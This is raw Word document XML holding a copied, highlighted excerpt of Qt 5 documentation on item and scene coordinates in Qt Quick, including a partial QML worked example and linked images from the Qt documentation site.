          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1893" w:history="1">
        <w:r w:rsidRPr="00B55535">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information about the concept of a scene graph and why it is beneficial, and about the scene graph adaptations provided by Qt Quick.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55535" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1894" w:history="1">
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-visualcanvas-coordinates.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1515" w:name="_Toc483000858"/>
      <w:bookmarkStart w:id="1516" w:name="_Toc483003851"/>
      <w:bookmarkStart w:id="1517" w:name="_Toc483604204"/>
      <w:bookmarkStart w:id="1518" w:name="_Toc483605424"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Concepts - Visual Coordinates in Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1515"/>
      <w:bookmarkEnd w:id="1516"/>
      <w:bookmarkEnd w:id="1517"/>
      <w:bookmarkEnd w:id="1518"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1519" w:name="item-coordinates"/>
      <w:bookmarkStart w:id="1520" w:name="_Toc483000859"/>
      <w:bookmarkStart w:id="1521" w:name="_Toc483003852"/>
      <w:bookmarkStart w:id="1522" w:name="_Toc483604205"/>
      <w:bookmarkStart w:id="1523" w:name="_Toc483605425"/>
      <w:bookmarkEnd w:id="1519"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item Coordinates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1520"/>
      <w:bookmarkEnd w:id="1521"/>
      <w:bookmarkEnd w:id="1522"/>
      <w:bookmarkEnd w:id="1523"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> system of visual coordinates used in Qt Quick is </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item coordinates</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cartesian</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> coordinate system with </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(0,0)</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top left</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> corner of the item. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-axis grows to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>right</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-axis grows </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>downwards</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, so that the bottom right corner of the item is at coordinates (width, height).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>individual item's position is specified in terms of its parent's coordinate system</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means that reading x,y values from non-sibling items may require conversion to convert them into the same coordinate system. </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene coordinates are often used</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the intermediate coordinate system when this occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1524" w:name="scene-coordinates"/>
      <w:bookmarkStart w:id="1525" w:name="_Toc483000860"/>
      <w:bookmarkStart w:id="1526" w:name="_Toc483003853"/>
      <w:bookmarkStart w:id="1527" w:name="_Toc483604206"/>
      <w:bookmarkStart w:id="1528" w:name="_Toc483605426"/>
      <w:bookmarkEnd w:id="1524"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene Coordinates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1525"/>
      <w:bookmarkEnd w:id="1526"/>
      <w:bookmarkEnd w:id="1527"/>
      <w:bookmarkEnd w:id="1528"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Scene coordinates are the coordinates where </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(0,0) corresponds to the top left corner of the window</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the scene is currently being rendered. Scene coordinates are usually the </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same as the item coordinates of the root item</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convert</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from item to scene coordinates using the functions on the item whose coordinate system you are interested in. See</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1895" w:anchor="mapFromItem-method" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::mapFromItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1896" w:anchor="mapToItem-method" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::mapToItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for converting to scene coordinates, or another item's coordinates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1529" w:name="worked-example"/>
      <w:bookmarkStart w:id="1530" w:name="_Toc483000861"/>
      <w:bookmarkStart w:id="1531" w:name="_Toc483003854"/>
      <w:bookmarkStart w:id="1532" w:name="_Toc483604207"/>
      <w:bookmarkStart w:id="1533" w:name="_Toc483605427"/>
      <w:bookmarkEnd w:id="1529"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Worked Example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1530"/>
      <w:bookmarkEnd w:id="1531"/>
      <w:bookmarkEnd w:id="1532"/>
      <w:bookmarkEnd w:id="1533"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The below QML code creates an arrangment of squares, with dots added for identification of points:</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200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200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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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x</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100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y</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100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lastRenderedPageBreak/>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100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100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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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50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50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="00CF3A01"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CF3A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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CF3A01">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60552B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
